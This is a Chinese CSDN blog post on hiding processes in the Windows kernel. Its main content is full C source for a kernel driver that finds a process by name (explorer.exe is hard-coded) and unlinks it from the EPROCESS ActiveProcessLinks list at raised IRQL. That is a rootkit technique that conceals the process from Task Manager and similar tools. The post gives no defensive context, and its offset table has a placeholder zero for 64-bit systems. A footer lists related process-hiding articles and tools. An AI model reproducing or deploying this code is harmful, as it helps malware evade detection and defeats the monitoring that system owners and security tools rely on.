内核隐藏进程

最新推荐文章于 2024-07-07 08:40:16 发布
最新推荐文章于 2024-07-07 08:40:16 发布
阅读量2.5k 收藏 7
点赞数 1
分类专栏: 驱动编程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq125096885/article/details/53189657
版权 

#include <ntifs.h>
#include <ntddk.h>
#include <Ntstrsafe.h>

NTKERNELAPI UCHAR *PsGetProcessImageFileName(PEPROCESS Process);


#ifndef MAX_PATH
#define MAX_PATH          260
#endif


DWORD                   g_OsVersion;                                            //系统版本  
																				//操作系统版本  
#define WINXP                   51  
#define WIN7                    61  
#define WIN8                    62  
#define WIN81                   63  
#define WIN10                   100  

																				//获取系统版本  
BOOLEAN GetOsVer(void);


ULONG_PTR EprocessActiveProcessLinks;

//获取ActiveProcessLinks
ULONG_PTR GetEprocessActiveProcessLinks();

//隐藏进程
NTSTATUS HideProcess(ULONG Processid);

//获取进程Processid
ULONG GetProcessProcessid(char* pProcessName);

VOID DriverUnload(IN PDRIVER_OBJECT DriverObject)
{

	return;
}


NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath)
{
	NTSTATUS status;
	DriverObject->DriverUnload = DriverUnload;

	DbgBreakPoint();
	HideProcess(GetProcessProcessid("explorer.exe"));
	return STATUS_SUCCESS;
}

//隐藏进程
NTSTATUS HideProcess(ULONG Processid)
{
	//定义变量
	KIRQL Kirql;
	PLIST_ENTRY plistprocsTarge = NULL;
	PLIST_ENTRY plistprocsSource = NULL;
	NTSTATUS status;
	PEPROCESS Process = NULL;

	//参数效验
	if (Processid <= 4)return STATUS_UNSUCCESSFUL;

	//获取系统
	if (GetOsVer() == FALSE)return STATUS_UNSUCCESSFUL;

	//获取ActiveProcessLinks
	if (EprocessActiveProcessLinks == NULL)
	{
		EprocessActiveProcessLinks = GetEprocessActiveProcessLinks();
		if (EprocessActiveProcessLinks == NULL)return STATUS_UNSUCCESSFUL;
	}

	//获取PEPROCESS
	status = PsLookupProcessByProcessId(Processid, &Process);
	if (NT_SUCCESS(status))
	{
		plistprocsSource = (PLIST_ENTRY)((ULONG_PTR)Process + EprocessActiveProcessLinks);
		Kirql = KeRaiseIrqlToDpcLevel();
		//*((PULONG_PTR)plistprocsSource->Blink) = (ULONG_PTR)plistprocsSource->Flink;
		//*((PULONG_PTR)plistprocsSource->Flink + 1) = (ULONG_PTR)plistprocsSource->Blink;
		RemoveEntryList(plistprocsSource);
		InitializeListHead(plistprocsSource);
		KeLowerIrql(Kirql);
		ObfDereferenceObject(Process);
	}
	return status;
}


//获取ActiveProcessLinks
ULONG_PTR GetEprocessActiveProcessLinks()
{
	//_EPROCESS 

#ifdef _WIN64
	EprocessActiveProcessLinks = 0x00;
#else
	switch (g_OsVersion)
	{
	case WINXP:
		EprocessActiveProcessLinks = 0x088;
		break;
	case WIN7:
	case WIN8:
	case WIN81:
	case WIN10:
		EprocessActiveProcessLinks = 0x0b8;
		break;
	default:
		break;
	}
#endif

	return EprocessActiveProcessLinks;
}


//获取进程Processid
ULONG GetProcessProcessid(char* pProcessName)
{
	//参数效验
	if (MmIsAddressValid(pProcessName) == FALSE)return NULL;


	//定义变量
	PEPROCESS pEprocess = NULL;
	NTSTATUS ntstatus = STATUS_SUCCESS;
	UCHAR *szProcessName = NULL;
	ULONG	Processid = 0;

	for (int i = 4; i < 10000; i = i + 4) //一般来说没有超过100000的PID和TID
	{
		//进程ID和返回一个引用指针的过程EPROCESS结构
		ntstatus = PsLookupProcessByProcessId((HANDLE)i, &pEprocess);
		if (NT_SUCCESS(ntstatus))//STATUS_INVALID_CID
		{
			if (pEprocess != NULL)
			{
				//比较进程名
				szProcessName = PsGetProcessImageFileName(pEprocess);
				if (szProcessName)
				{
					if (_stricmp((char*)szProcessName, pProcessName) == 0)
					{
						ObfDereferenceObject(pEprocess);
						return (HANDLE)i;
						
					}
				}
			}
			ObfDereferenceObject(pEprocess);
		}
	}

	return NULL;

}

//获取系统版本  
BOOLEAN GetOsVer(void)
{

	ULONG    dwMajorVersion = 0;
	ULONG    dwMinorVersion = 0;
	PsGetVersion(&dwMajorVersion, &dwMinorVersion, NULL, NULL);
	if (dwMajorVersion == 5 && dwMinorVersion == 1)
		g_OsVersion = WINXP;
	else if (dwMajorVersion == 6 && dwMinorVersion == 1)
		g_OsVersion = WIN7;
	else if (dwMajorVersion == 6 && dwMinorVersion == 2)
		g_OsVersion = WIN8;
	else if (dwMajorVersion == 6 && dwMinorVersion == 3)
		g_OsVersion = WIN81;
	else if (dwMajorVersion == 10 && dwMinorVersion == 0)
		g_OsVersion = WIN10;
	else
	{
		g_OsVersion = 0;
		KdPrint(("未知版本"));
		return FALSE;
	}

	return TRUE;
}

125096
关注
专栏目录
内核下断链隐藏进程(兼容多版本Windows系统,非硬编码)
Think88666的博客
09-01 1375
内核下断链隐藏进程(兼容多版本Windows系统,非硬编码)
在windows内核模式下隐藏进程
sky的专栏
12-19 4469
进程隐藏内核实现 1、在内核模式下,系统为每个进程维护了一个EPROCESS结构体,系统所有的进程是通过EPROCESS结构体中的一个ActiveProcessLinks指向的双端链表连接起来的,通过winDBG内核调试工具就可以发现并获取其相对于EPROCESS结构体的地址(0x88),这样我们可以通过遍历该循环链表找到我们的目的进程将其链表的节点删除即可隐藏进程。(EPROCESS中进程
用Visual studio2012在Windows8上开发内核隐藏进程
weixin_30788239的博客
08-20 169
在Windows NT中,80386保护模式的“保护”比Windows 95中更坚固,这个“镀金的笼子”更加结实,更加难以打破。在Windows 95中,至少应用程序I/O操作是不受限制的,而在Windows NT中,我们的应用程序连这点权限都被剥夺了。在NT中几乎不太可能进入真正的ring0层。在Windows NT中,存在三种Device Driver: 1.“Virtual devi...
浅谈进程隐藏技术
最新发布
蚁景网安学院
07-07 908
在之前几篇文章已经学习了解了几种钩取的方法,这篇文章就利用钩取方式完成进程隐藏的效果。在实现进程隐藏时,首先需要明确遍历进程的方法。
隐藏进程内核
qq_31507523的博客
04-09 2767
隐藏进程内核版实现 隐藏进程通常出现在恶意程序中,隐藏进程能让任务管理器、procexp等3环的程序无法找到它,那么如何实现隐藏进程呢? 由于对这方面还是很感兴趣,今天就来研究一下内核层的隐藏进程,首先在用户层3环,如任务管理器、procexp遍历进程都是使用CreateToolhelp32Snapshot()API创建快照遍历查找的,使用快照的API在内核中就是通过访问一个双向链表的数据结构...
内核学习--驱动隐藏进程
weixin_34080903的博客
03-22 343
实在不好意思拿出手,都是人家玩烂的技术了。。。可我还是要学习。。。也给小白们科普了 原理: windows系统内核内部采用链表的方式将进程链起来。如果我们从链表中摘掉想要隐藏进程,那么一般的采用这种方式遍历进程的工具也就没有用处了。。也就达到我们的目的了。。悲哀的任务管理器。。。具体的就不记录了。。。(但是这种方法对现在的杀毒基本不起什么作用。。除了一些弱智杀毒软件。。。) 对内核数据结...
编程技术_Windows 内核进程隐藏侦测技术-综合文档
05-19
在Windows操作系统中,内核进程隐藏侦测技术是一种高级的计算机安全技术,它涉及到操作系统的核心层,主要用于检测和防止恶意软件通过隐藏进程来规避安全软件的检测。本技术主要针对那些试图通过修改系统内核行为...
HideProcess完结篇.zip_c++ 进程隐藏_c++隐藏进程_隐藏进程_隐藏驱动_驱动隐藏进程
07-15
2. **注册表操作**:修改注册表键值以隐藏进程在任务管理器中的显示,例如更改`HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options`下的设置。 3. **系统API调用**:...
易语言隐藏进程模块源码(1).rar
08-03
在这个“易语言隐藏进程模块源码(1).rar”压缩包中,包含的是利用易语言编写的程序,用于实现进程隐藏功能。这一技术在系统管理、安全防护以及恶意软件中都有所应用。 首先,我们要理解什么是进程隐藏。在操作...
驱动级的隐藏进程代码,在驱动层通过替换ssdt地址表中的函数来隐藏进程...
06-26
在IT安全领域,驱动级的隐藏进程技术是一种高级的系统隐藏策略,主要应用于恶意软件或黑客工具中,目的是避开安全软件的检测。本篇将详细解释这种技术,并着重讨论如何在驱动层通过替换System Service Dispatch ...
进程隐藏工具--内核驱动实现
12-21
可以实现进程的遍历和隐藏,自己写的,希望大家批评指正,谢谢!
内核驱动中检测隐藏进程
04-20
内核驱动中检测隐藏进程
隐藏windows进程
04-21
隐藏进程 隐藏进程 隐藏进程 隐藏进程 隐藏进程 隐藏进程 隐藏进程
简易窗口隐藏工具 隐藏WINDOW窗口
11-08
简易窗口隐藏工具 隐藏WINDOW窗口,只在WINDOWS系统中使用过。
隐藏进程工具非常好用
06-21
十分好用的隐藏进程工具,win7 64位 完美运行!十分好用的隐藏进程工具,win7 64位 完美运行!十分好用的隐藏进程工具,win7 64位 完美运行!
说说windows内核中为什么要隐藏进程
weixin_33948416的博客
01-08 615
 好久没有写博客了,最近抽时间把这些杂碎零散的知识梳理下来,分享给更多朋友去找乐子,在草稿箱里面仍了好几天忘发了。接下来谈谈本篇主题,隐藏两字。一、隐藏意味着什么?  不想被人发现呗,人性如此,亦是如此。二、为什么要隐藏?  其实个人觉着这是根本,好好写个程序你为什么要隐藏自己的进程、线程?为啥?无非你不想让别人知道,或者不该让别人知道。windwos下有很多未公开的东西,这是隐藏。面对对象...
内核层 inlinehook 隐藏进程
ShadowAssassin的专栏
12-17 3765
上次是SSDT  HOOK 方式 隐藏 进程 ,如链接:http://blog.csdn.net/hjxyshell/article/details/16993119 这次是InlineHook 方式隐藏进程,这里inline hook的原理就不做详细介绍了,网上相关资源较多,撸主主要参考看雪的某大牛的“详谈内核三步走Inline Hook实现”(http://bbs.pediy.com/s
_EPROCESS断链 —— 实现进程内核隐藏
walker的博客
03-06 2390
我们可以利用 _EPROCESS 结构体中的 ActiveProcessLinks 双向链表遍历进系统中的进程,并将特定进程从该双向链表中移除,以达到隐藏特定进程的目的。 _EPROCESS _EPROCESS 结构体是内核用于管理和维护进程的结构体,每个进程都会有一个属于自己的结构体。同一个程序创建了多个进程,其就会有对应个数的 _EPROCESS 。 _EPROCESS 的结构如下: kd> dt _EPROCESS nt!_EPROCESS +0x000 Pcb
Windows下四种隐藏进程技巧详解
"这篇文章主要介绍了在Windows操作系统中隐藏进程的四种方法,包括DLL注入、API Hook、利用NT内核函数以及RootKit技术。这些方法通常需要一定的编程知识和技巧来实现,适用于高级用户或开发者。" 在Windows系统中,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值